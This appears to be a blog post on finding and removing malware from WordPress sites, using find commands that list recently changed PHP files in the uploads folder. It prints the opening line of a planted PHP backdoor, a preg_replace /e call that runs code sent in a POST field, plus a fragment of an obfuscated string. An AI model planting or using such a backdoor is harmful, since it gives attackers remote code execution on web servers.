Remove WordPress Malware using Linux Shell Console

I’ve a lot of wordpress sites, recently few of my old sites infected malware, and those spammer using few of my sites to spam email. I would like to share the way I fix this.

Most of the spammer look for the 777 path, most properly in /wp-content/uploads/
So I try to scan all the php files that they upload there with date.

find ./public_html/wp-content/uploads/ -type f  -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort

Then I found these

2015-10-16 12:25:01 ./wp-content/uploads/2013/05/blog84.php
2015-10-16 12:25:01 ./wp-content/uploads/2014/10/dump.php
2015-10-16 12:25:01 ./wp-content/uploads/2014/code.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/07/session90.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/09/xml96.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/504.php
2015-10-16 12:25:01 ./wp-content/uploads/about_us.php
2015-10-16 12:25:01 ./wp-content/uploads/contactus.php
2015-10-16 12:25:01 ./wp-content/uploads/rtbwvcsxrnbsvcd.php
2015-10-16 12:25:01 ./wp-content/uploads/sc_afsed.php
2015-10-16 12:25:01 ./wp-content/uploads/team.php
2015-10-16 12:25:01 ./wp-content/uploads/wp-upload.php

This Kind of files should be remove and they will spam.
You can view the file header to see is it spam or not.

head ./wp-content/uploads/2013/05/blog84.php

It will show something like this

<?php @preg_replace('/(.*)/e', @$_POST['dnrdztvetxn'], '');
 $GLOBALS['af4569'] = "\x40\x46\x33\x2e\x62\x7a\x6e\x4c\xa\x7e\x28\x39\x59\x71\x54\x5f\x73\x65\x3f\x77\x5d\x29\x6c\x2f\x79\x50\x56\x63\x5c\x4f\x3c\x70\x2d\x34\x24\x4d\x4a\x53\x57\x67\x44\x51\x23\x43\x7d\x64\x2b\x72\x5

You should remove it immediately.

Search Malware files in WordPress

If you are server admin, you would like to scan all the users, you can try this

find /home/*/domains/*/public_html/wp-content/uploads/ -type f  -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort

or

find /home/nginx/domains/*/public/wp-content/uploads/ -type f  -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort

The best way to find out all possible files, I suggest you upgrade the WordPress to latest version
Then try

find ./public_html -type f  -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort

This will sort all the date of php file with modified date, you can find it out and remove them easily.